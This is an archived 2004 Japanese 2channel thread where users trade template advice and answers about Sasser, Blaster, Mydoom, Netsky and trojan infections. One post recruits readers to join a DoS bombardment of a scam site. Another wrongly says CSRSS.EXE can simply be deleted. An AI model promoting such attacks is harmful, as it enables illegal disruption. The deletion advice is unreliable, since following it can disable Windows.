5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ウィルス情報&質問 総合スレッド☆Part24

1 :名無しさん@お腹いっぱい。:04/09/05 20:27
ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

テンプレサイト(質問する前、書き込む前に必読)
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html

テンプレの修正・加筆箇所は>>2-10あたり

前スレッド
ウィルス情報&質問 総合スレッド☆Part22(実質Part23)
http://pc5.2ch.net/test/read.cgi/sec/1091895881/

2 :名無しさん@お腹いっぱい。:04/09/05 20:28
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2002、Inter Scan
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonAntiVirus for Mac
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/indexjpn.html
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・日本ネットワークアソシエイツ株式会社 http://www.nai.com/japan/
 製品名:McAfee VirusScan 、GroupShield
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。

3 :名無しさん@お腹いっぱい。:04/09/05 20:28
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

4 :名無しさん@お腹いっぱい。:04/09/05 20:29
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。ランダムに選択された
IPアドレスを持つコンピュータを走査し、拡散します。亜種も出現しているので、
出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、
ウイルススキャンで検出できません。最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、
メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.asp
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

5 :名無しさん@お腹いっぱい。:04/09/05 20:29
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

6 :名無しさん@お腹いっぱい。:04/09/05 20:29
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット

7 :名無しさん@お腹いっぱい。:04/09/05 20:34
「がいしゅつです」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました
  デスクトップの背景が蓮画像になってしまいます
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
http://tmp4.2ch.net/test/read.cgi/download/1093270545/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part3
http://pc5.2ch.net/test/read.cgi/sec/1094319700/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら・・・助けて下さい!Part39
http://pc6.2ch.net/test/read.cgi/pcqa/1093816017/

8 :名無しさん@お腹いっぱい。:04/09/05 20:38
過去スレ

Part1  http://pc.2ch.net/sec/kako/1010/10109/1010948022.html
Part2  http://pc.2ch.net/sec/kako/1016/10168/1016863569.html
Part3  http://pc.2ch.net/sec/kako/1020/10206/1020696417.html
Part4  http://pc.2ch.net/sec/kako/1024/10240/1024061532.html
Part5  http://pc.2ch.net/sec/kako/1027/10273/1027397623.html
Part6  http://pc.2ch.net/sec/kako/1031/10317/1031796923.html
Part7  http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
Part8  http://pc.2ch.net/test/read.cgi/sec/1039859073/
Part9  http://pc.2ch.net/test/read.cgi/sec/1045816526/
Part10 http://pc.2ch.net/test/read.cgi/sec/1051155882/
Part11 http://pc.2ch.net/test/read.cgi/sec/1056101401/
Part12 http://pc.2ch.net/test/read.cgi/sec/1060186382/
Part13 http://pc.2ch.net/test/read.cgi/sec/1061454729/
Part14 http://pc.2ch.net/test/read.cgi/sec/1064028518/
Part15 http://pc.2ch.net/test/read.cgi/sec/1068311899/
Part16 http://pc3.2ch.net/test/read.cgi/sec/1077539309/
Part17 http://pc3.2ch.net/test/read.cgi/sec/1080552371/
Part18 http://pc5.2ch.net/test/read.cgi/sec/1081735712/
Part19 http://pc5.2ch.net/test/read.cgi/sec/1083586576/
Part20 http://pc5.2ch.net/test/read.cgi/sec/1086098775/
Part21 http://pc5.2ch.net/test/read.cgi/sec/1087695514/
Part22 http://pc5.2ch.net/test/read.cgi/sec/1089171169/
Part23 http://pc5.2ch.net/test/read.cgi/sec/1091895881/

9 :名無しさん@お腹いっぱい。:04/09/05 20:41
関連スレッド

コンピュータウィルス総合スレッド VOL.40
http://pc6.2ch.net/test/read.cgi/pcqa/1092168060/
【初心者向】ウイルス対策ソフト質問スレ part3
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/
【警報】Winnyを狙ったワーム・ウイルス情報 Part23
http://tmp4.2ch.net/test/read.cgi/download/1091063187/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/

10 :名無しさん@お腹いっぱい。:04/09/05 20:56
ダークロリータが出てきて速攻消したんですけど大丈夫ですか?



11 :名無しさん@お腹いっぱい。:04/09/05 20:58
>>10
不安ならアンチウィルスソフトでスキャンすればいいだろ。終了

12 :名無しさん@お腹いっぱい。:04/09/05 21:47
>>1は都昆布

13 :名無しさん@お腹いっぱい。:04/09/06 01:28
パソにあんまり詳しくないものですが、ここ2,3日に約30通以上の
ウィルスつきのメールが送られて来てます。
ウィルスバスターで隔離していますが、メールチェックのたびに送られてきていて
これはなんなんでしょうか?


14 :名無しさん@お腹いっぱい。:04/09/06 01:31
>>13
貴方のメアドを登録している知人か誰かのPCがウイルスに感染してしまった。

15 :名無しさん@お腹いっぱい。:04/09/06 01:40
>14
その人が気づくまで永遠に送られてくるのでしょうか??

16 :名無しさん@お腹いっぱい。:04/09/06 02:05
>>15
はい

17 :名無しさん@お腹いっぱい。:04/09/06 02:17
【祭りのヨカーン】詐欺行為の悪質サイト潰し★3
http://news13.2ch.net/test/read.cgi/news/1094395950/l50

このスレのトップにあるURLを踏むと

>登録しますた。
>15000円の使用料を払ってください。
>個人情報を取得しましたので支払いが無い場合催促しに行きます等の文章とともに銀行の口座番号が表示されます。

これは俗にワンクリック登録などという詐欺行為で金を稼ぐ架空請求です。
今ニュー速板住人が田代砲で爆撃中。落ちたかと思えば復活する難攻不落のサイトとのこと。

協力求む「弾幕薄いぞ何やってんの!!」

18 :名無しさん@お腹いっぱい。:04/09/06 02:28
>>17
お楽しみに水差して悪いけど、コレって銀行口座までわかってんだから
警察と銀行に通報した方が早くね?うまくすりゃ口座閉鎖に持っていけ
るだろうし。どうせどっかの厨から買った口座だろうから、また変えて
復活するだろうけどさ。

19 :名無しさん@お腹いっぱい。:04/09/06 02:35
あぁ後「この板ではアタック依頼は受け付けません。」ってことらしいし・・・。

20 :いなむらきよし:04/09/06 02:38
大地震とかの災害の時には誰が奇形を守ってくれるのかキケー!

21 :あああ:04/09/06 02:46
メール送信していないのに、大量の発信メッセージのウィルスチェックポップアップがでます。
まさに下記症状なのですが、対策ございますか?
http://security.okweb.jp/kotaeru.php3?q=927048

XP、ノートンアンチウィルス・インターネットセキュリティ2002
パターンファイルは最新。Ad-aware等も効果なし。

踏み台ってやつっすかねー?

22 :名無しさん@お腹いっぱい。:04/09/06 07:54
ラッキーじゃん!苦労せずにメル鯖立てるなんて

23 :名無しさん@お腹いっぱい。:04/09/06 09:56
>>17
まだやってたんか

>>18
銀行は警察に通報しると言うだけだし、K札も被害者からの電話じゃないから
相手にしないらしい。


24 :名無しさん@お腹いっぱい。:04/09/06 13:49
すいません、質問させてください

インターネットに繋いだ途端に、コマンドコロンプトみたいなのが一瞬だけ表示され
すぐに消えます。(しかも複数)
これはトロイに感染されていると考えてもよろしいのでしょうか?

毎回ネットに繋ぐと、常駐ソフトが反応し駆除してるのですが、またネットにつなぎなおすと感染してるようなんです。

25 :名無しさん@お腹いっぱい。:04/09/06 15:05
>>24
ルータなりファイヤーウォールなり入れろ。

26 :名無しさん@お腹いっぱい。:04/09/06 15:07
>>24
トロイに感染してると思ったら、アンチウィルスソフトなりアンチトロイソフトなりで
スキャンしてみれば分かる事じゃねーのか?何で入れもせずに聞くの?

27 :18:04/09/06 16:13
>>23
情報アリガd。どっかで見たか聞いた事を俺が良いように解釈して
記憶してただけみたいだねorz

28 :名無しさん@お腹いっぱい。:04/09/06 18:54
>>26
スキャンして、感染しているので駆除し、またネットにつなぎなおした途端にまた同じ症状になるのです。

29 :名無しさん@お腹いっぱい。:04/09/06 18:57
>>28
使っているアンチウィルスソフトは?
他のアンチトロイウェアソフトは試してみた?他の会社のオンラインスキャンは?
何ていうウィルスに感染してるの?

その辺を書かなきゃエスパーじゃなきゃわかるわけないだろ。

30 :名無しさん@お腹いっぱい。:04/09/06 19:35
友人のPCがSasserに感染していました。
テンプレのようにしてカウントダウンは止めたんですが、
その後はまずどうすれば良いのでしょう?

友人のPCはほとんど買ったままの状態で、
セキュリティソフト、アンチウィルスソフト等は入っていません。

31 :名無しさん@お腹いっぱい。:04/09/06 19:42
>>30
>セキュリティソフト、アンチウィルスソフト等は入っていません。
じゃあ入れれば(・∀・)イイ!!

32 :名無しさん@お腹いっぱい。:04/09/06 19:46
>>31
サンクス!
でもカウントダウンを止めただけじゃあSasserはまだ駆除出来てないよね?
ウイルスがPCに入ってる状態でノートン先生をインストールしても良いのかな?

33 :名無しさん@お腹いっぱい。:04/09/06 19:52
>>32
ttp://www.trendmicro.com/search/google/ja-jp/results.asp?lr=lang_ja-jp&q=sasser
とりあえずオンラインスキャンしてみれ

34 :MyDoom被害経験者(当時は深刻):04/09/06 23:28
>24
ボクのPCもOnSrvr.exeとShrnkwrp.exeがしきりに
ttp:/ads.onwebmedia.comにアクセスをしようとしているんです。
何回か許せば気が済むかな?と思ったら今でも何回もしつこいです。
Spybotがこれを検出してくれないので、悲しいです。はい。

今も何かのネットワークアクセスに忙しいようで、PCの処理がとっても
重いです。駆除し切れなかった歴代のワームが今夜も活発に暴れている
のかもしれません。

35 :名無しさん@お腹いっぱい。:04/09/06 23:43
>>34
ググったら速攻で情報出てくるじゃん。トロイの木馬だよ。
http://www.symantec.com/region/jp/avcenter/venc/data/trojan.download.chekin.html
OnSrvr.exe
http://www.liutilities.com/products/wintaskspro/processlibrary/onsrvr/
Security Risk ( Virus/Trojan/Worm/Adware/Spyware ): Yes

ちゃんとアンチウィルスソフトは入れておけ。
Spybotだけじゃなく、Ad-awareSEやCWShredderで駆除しろ。
アンチトロイソフトも試してみろ。

36 :名無しさん@お腹いっぱい。:04/09/06 23:44
>>34はマルチ
氏ね


37 :名無しさん@お腹いっぱい。:04/09/06 23:47
>>36
だな、AVG+Spybot+Outpostユーザーだなどうやら。死んでくれ。
こんな奴が、「AVG検出力ワリーヨ」とか騒いでるんだろうな( ´_ゝ`)y−

38 :30:04/09/07 01:36
どうやら私が思ってた以上に症状はひどいようでした。

カウントダウンは止まるのですが、
インターネットに繋げなくなりました。
その他、アプリケーションの起動が出来なくなり
「デスクトップの更新」をするとほとんどのアイコンがデスクトップから消え、
削除されているなど、どうしようもない状態。

このスレの人ならこの状態になった時はどうするのですか?
私は友人と考えたのですが、何も思いつきませんでした。

39 :名無しさん@お腹いっぱい。:04/09/07 01:48
>>38
システムの復元ができるXPとかなら、システムの復元かな。
復元不能なら、俺ならリカバリしてアンチウィルスソフトやアンチスパイウェアソフトを
最初から入れてしっかり予防しておく。WindowsUpdateもきっちりやる。

40 :名無しさん@お腹いっぱい。:04/09/07 03:05
友人のPCがウイルスに感染したみたいなのですが、
ノートンとバスター(どちらも体験版)でも検索にひっかかりませんでした。

症状としましては、どこからか拾って来た仮装CDファイルをデーモンツールに
入れて起動したらドラクエのデータが消える音と共に画面が
赤くなって動かなくなってしまうみたいです。
何度も再起動しても起動後同じ症状がでるみたいです。
OSはwindows98です。
対処方等知っている方がおられましたらどうかおしえてください。

41 :名無しさん@お腹いっぱい。:04/09/07 03:08
>>40
Antinnyの新しいウィルスらしいよ。という事で自己責任だろうな。
たぶん、まだどこのアンチウィルスソフトも対応してないと思うよ。

これに懲りたらWinnyはやめとけ、と助言しとけ。

42 :40:04/09/07 03:40
早速のレスありがとうございます。
友人にこのスレの事言っていたので、レスを見たらしくもうしないとメールいれてきました。
この度はありがとうございました。



43 :名無しさん@お腹いっぱい。:04/09/07 09:29
>>30
多分SASSER以外もいるよ

44 :名無しさん@お腹いっぱい。:04/09/07 09:53
友人が〜知人が〜と前振りする香具師の大半は
自分のことを他人に置き換えて質問している

45 :名無しさん@お腹いっぱい。:04/09/07 10:25
>>45
だから?と釣られてみる

46 :名無しさん@お腹いっぱい。:04/09/07 11:02
>>4
自分にレスしてどうする?とさらに釣られてみる

47 :名無しさん@お腹いっぱい。:04/09/07 11:07
>>45-46
おまいらはレス先の番号すらまともに書けないのか?
とさらにさらに釣られてみる

48 :名無しさん@お腹いっぱい。:04/09/07 11:14
>>45
自分で質問できなくて他人に質問させる香具師は氏ね
自分のことなのに他人のことにして質問する香具師はもっと氏ね

ってことだろ

49 :名無しさん@お腹いっぱい。:04/09/07 17:32
すいません、質問させてください

受信と送信のバイト数が
送信のほうが圧倒的に多いのですが、(ネットに繋げただけで何もしてない状態で)
これは何かトロイ系に感染していじられているのでしょうか?

AD-awereやavasでスキャンしたときは何も見つからなかったのですが。

50 :名無しさん@お腹いっぱい。:04/09/07 18:12
>>49
明らかに怪しいな、と思ったら何で他のフリーソフトも試してみないの?
それだけの情報でトロイに感染したかどうかなんてわかるかよ

ファイヤーウォールは入っているのか、何か変なものが接続しようとしてないか?
Spybotは試したのか?アンチトロイウェアソフトは試してみたのか?

51 :名無しさん@お腹いっぱい。:04/09/08 09:29
あげ

52 :名無しさん@お腹いっぱい。:04/09/08 10:59
誘導されてきました。
OSはXPなんですが、この方法について質問があります。

■FAQ.4
Q.レジストリエディタをメモ帳に書き換えられてしまいました。どうやったら元に戻せますか?
1.OSのインストールディスクからオリジナルの regedit.exe を探し出す。
  ◆XPの場合→インストールディスクの入ったドライブをD:とするとD:\I386\REGEDIT.EXE
2.今あるregedit.exeをオリジナルで上書きする。
  ◆XP/2000/Meの場合→C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き

>2.今あるregedit.exeをオリジナルで上書きする。

オリジナルまでいって、
「C:\Windows\system32\dllcache\regedit.exe、C:\Windows\ regedit.exe の順で上書き」
がよくわからないんですが、
「C:\Windows\system32\dllcache\regedit.exe」を「C:\Windows\ regedit.exe」に上書きするってことですか?

53 :名無しさん@お腹いっぱい。:04/09/08 10:59
Win32/Pariteとかいうのに感染した場合どうすればいいのですか?

54 :名無しさん@お腹いっぱい。:04/09/08 13:53
>52
2.の文面を読む限り書いてある順番で両方の箇所のregedit.exeを1.のオリジナルで上書きするんだと思うぞ

55 :名無しさん@お腹いっぱい。:04/09/08 13:54
>53
アンチウイルスソフトで駆除してください

56 :名無しさん@お腹いっぱい。:04/09/08 14:51
VAIOを買った際にプリインストールされていた、「Norton AntiVirus 2003」を使用しています。
そろそろ更新サービスの期限が切れるので、ストアでキーを購入しようとしているところなんですが…。
この際2004をダウンロード版を買ってアップグレードした方がいいでしょか?


57 :名無しさん@お腹いっぱい。:04/09/08 18:49
ここはアンチウィルスソフトの相談所じゃねーぞ


58 :名無しさん@お腹いっぱい。:04/09/08 21:08
>>52
ダウソ板に池

59 :114:04/09/08 21:16
>>52
ny関係は>>1に書いてある通り、download板に行ってください
ここではお答えできません


60 :名無しさん@お腹いっぱい。:04/09/09 00:38
パソコンがウイルス感染したため、クリーンインストールしました。
その後、スクリーンセイバーを設定しようとしたところ、元から入っている、
「60年代アメリカ」と、「サイエンス」というのを見たところ、
台風みたいなのが画面を動き回るのと、ボカシの入った丸いのが画面を
動き回るのでした。
ウイルス関連の書籍でこのようなウイルスもあると読んだことがあるのですが、
このスクリーンセイバーもウイルス感染しているのでしょうか?
それとも、元々このようなスクリーンセイバーなのでしょうか?

ちなみに、Windows98使用でNECのパソコンを使ってます。

61 :名無しさん@お腹いっぱい。:04/09/09 01:07
>>60
元々そうだと思うけど、不安ならコッチの方がよさげ↓

Windows9X・Me質問スレッド Part42
http://pc5.2ch.net/test/read.cgi/win/1092667061/l50


62 :名無しさん@お腹いっぱい。:04/09/09 03:25
torjan horseとかいうウィルスに感染しました。
norton anti virus2002を使って駆除しようとしましたができません
どうしたらいいでしょうか?
詳しい方教えてください

63 :名無しさん@お腹いっぱい。:04/09/09 03:30
>>62
駆除じゃなくてファイルを削除だ

64 :名無しさん@お腹いっぱい。:04/09/09 03:34
感染しているファイルを削除しようとしても
使用中で削除できませんとでてきます

65 :名無しさん@お腹いっぱい。:04/09/09 03:37
つか、ウイルス名がtrojan horseなの?

66 :名無しさん@お腹いっぱい。:04/09/09 03:44
>63
ちなみに感染しているファイルはCSRSS.EXEとCSRSS 2.DLL
なんだけど削除して問題ないのかな?

ウィルス名 がtrojan horseです

67 :名無しさん@お腹いっぱい。:04/09/09 06:41
>>66
削除して再起動すれば自動的に新しいファイルが作られる。それでOK.

68 :名無しさん@お腹いっぱい。:04/09/09 11:04
YBBってユーザーのウイルス対策どないなってんねん。
3回連絡してその都度対処するっていってんのに2ヶ月以上も
同じユーザーから毎日10以上届くぞ。

69 :名無しさん@お腹いっぱい。:04/09/09 11:16
>>67
こらーっ!!!

70 :名無しさん@お腹いっぱい。:04/09/09 11:35
>>66
そのウイルス新しいな。いいないいな♪
それはトロイだからレジストリがいじられていて自動的にプログラムが起動されているわけ
んでもってまずはそのプログラム名を探すか、怪しそうなのをみつけて終了させれば削除は可能になる。
次にレジストリの中の
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
から同じようにそのプログラムを実行してるやつを消す。

ノートン先生がちゃんとした削除方法とかを出すまではなんともいえないが
検出されたファイル名(.exe)=プログラム名と考えて
またそのファイルのパスをレジストリでのデータ欄と比べればだいたいみつかる。

71 :ぼるじょあ ◆yBEncckFOU :04/09/09 12:16
>>68
ヤフーに期待するほうがアフォだYO
気長に待つといいYO

72 :名無しさん@お腹いっぱい。:04/09/09 15:28
ネットの反応速度が遅い、マウスを動かしてもカーソルがすぐに移動しない、
メール画面にするとすぐにフリーズします。
1週間程まえに5通の不信メールが届きうっかり2通を開けてしまったのですが、
そのメールが届く少しまえからパソコンの調子が変でした。
販売店やメーカーに聞くとウイルスの可能性もあるが、何年もパソコンを使ってると
ウイルスでなくても動作に異常が出るのでたまに初期化したほうがいいかも知れない
と言われました。
どうすればいいですか?
ちなみにさっきパンダのHPに接続しようとしましたが表示されませんでした。

73 :名無しさん@お腹いっぱい。:04/09/09 15:39
>72
素直にリカバリ

74 :名無しさん@お腹いっぱい。:04/09/09 17:31
>70 どうやって怪しそうなプログラムをみつけるの?難しそうだからリカバリーでもいいのかな

75 :60:04/09/09 18:38
>>61
レスありがとうございます。
教えていただいたところで聞いてみます。
返事遅くなってすみませんでした。

76 :名無しさん@お腹いっぱい。:04/09/09 21:20
 wingr32.exe ってのを昨日捕獲しました。
進入方法はサッサーと同じような感じです。オンラインアップデート中にやられました(^^;
最初サッサーかなぁっと思ったのでオンラインスキャンなど試したんですが、検出されませんでした。
さらに拡散するためにサッサーと同じport445を叩いて進入するような動きをみせてました。
port445を使っていたので、完全にサッサーと思い込んでいてそこがミソでしたね。

んで進入後はあやしげなホスト名のport6667へむけてパケットを放出してました。
バックドアにでもしようとしたのでしょうかね?
ちなみに
2kでは
C:\WINNT\system32
ここにありました。
xpでは
c:\windows\system32
にありました。
あとはレジストリの自動実行などにもありました。

あとwinsr32.exeって名前で同じ挙動をしめすのも確認してます。
あとwinxp32.exeだったかな?ってのもありました。

以上参考までに。


77 :名無しさん@お腹いっぱい。:04/09/09 21:44
質問であります。 オンラインウィルスチェック(トレンドマイクロ)→トロイ発見→HP飛んで指示の通りにスル。
トロイの居場所はドライブCのウインドウズのダウンロードプログラムファイルの中。
で、コレって一時ファイルだっけ?とか思って勝手に
ディスククリーンアップ→全部チェック付けて実行。
で、モウ一回 オンラインウィルスチェック→トロイいなくなってた。
でも、ドライブCのウインドウズのダウンロードプログラムファイルの中は変わってナヒ・・・
コレでいいんでしょうか・・・? 不安デス。

78 :名無しさん@お腹いっぱい。:04/09/09 21:46
1,2行目の間の文が消えてたorz
後はトロイを消すだけだーってトコまできてから、コノ作業をしますた。

79 :名無しさん@お腹いっぱい。:04/09/09 22:22
何かね、最近、検出されたトロイ名は?とか、どこに検出されたのか具体的に書け!とか
変わってないって具体的にどういうこと?とか、シマンテックのオンラインスキャンもしてみ
ろ!とかアンチウイルスソフト常駐中させてねーのかよ!?といったツッコミも書き込む
気力がないんだ・・・。鬱かなぁ・・・。メンヘル版でも逝ってみるか・・・。

80 :名無しさん@お腹いっぱい。:04/09/09 22:38
>>77
はぁ?
不安ならこのツボを…

81 :名無しさん@お腹いっぱい。:04/09/09 22:39
偉いスンマセンorz
ウインドウズXPホームエディション使ってマス
トロイ名はTROJ_ISTBAR.Wで、別名はTR/Dldr.IstBar.PT, アイエスティバー
検出された場所はドライブCのウインドウズのダウンロードプログラムファイルの中デス。
ファイルを開いた時に出てくる中身、が変わってないので、本当に消えたのか心配、という事です。
シマンテックはその後やりましたが、検出されませんでした。
アンチは常駐させてません・・・

不備非常に申し訳ないです。 というかタブンまだ不備がありそうです・・・お手数かけて申し訳ないorz


82 :名無しさん@お腹いっぱい。:04/09/09 22:43
>>79
いっそツッコミもテンプレ化したらどうだ?

83 :名無しさん@お腹いっぱい。:04/09/09 22:46
>>81
オンラインスキャンして検出されないんなら消えたんだろ。
あと、アンチウイルスは必ず入れとけ。

84 :名無しさん@お腹いっぱい。:04/09/09 22:49
>>81
http://members.at.infoseek.co.jp/yas1091/R3_temp.swf?inputStr=%82%D4%82%C1%82%BF%82%E1%82%AF%82%BB%82%CC%83E%83C%83%8B%83X%89B%82%B5%83t%83@%83C%83%8B%82%C9%82%C8%82%C1%82%C4%82%BD%82%F1%82%B6%82%E1%82%CB%81%5B%82%CC%81H

85 :79:04/09/09 23:18
>>82
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

↑こんな感じ?別スレのを修正したんだけど。
あぁ〜鬱だぁ〜・・・。



86 :名無しさん@お腹いっぱい。:04/09/09 23:37
>>85
イキロ…って鬱な人には言っちゃダメなんだっけか?

【使用OS、WindowsUpdateの有無】
【使用AntiVirus、Updateの有無】
【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
【これまでにとった措置】

ちょっと修正。
とりあえずテンプレに入れてみるとか。

87 :85:04/09/10 00:02
>>86
ガンガレはだめって聞いたことあるけど、イキロはいいんでないか?

次スレまでまだまだあるから、当面はこの質問テンプレを(回答者の)
必要に応じて使ってもらおうか?

アリガd。

88 :名無しさん@お腹いっぱい。:04/09/10 00:20
【使用OS】WinXPSP2
【WindowsUpdateしてるか】している。
【AntiVirusは何を使っているか】eTrust、アンチドート。
【ちゃんとUpdateしてるか】している。
【スキャンした結果(ウイルス名・発見場所)】アンチドートで、
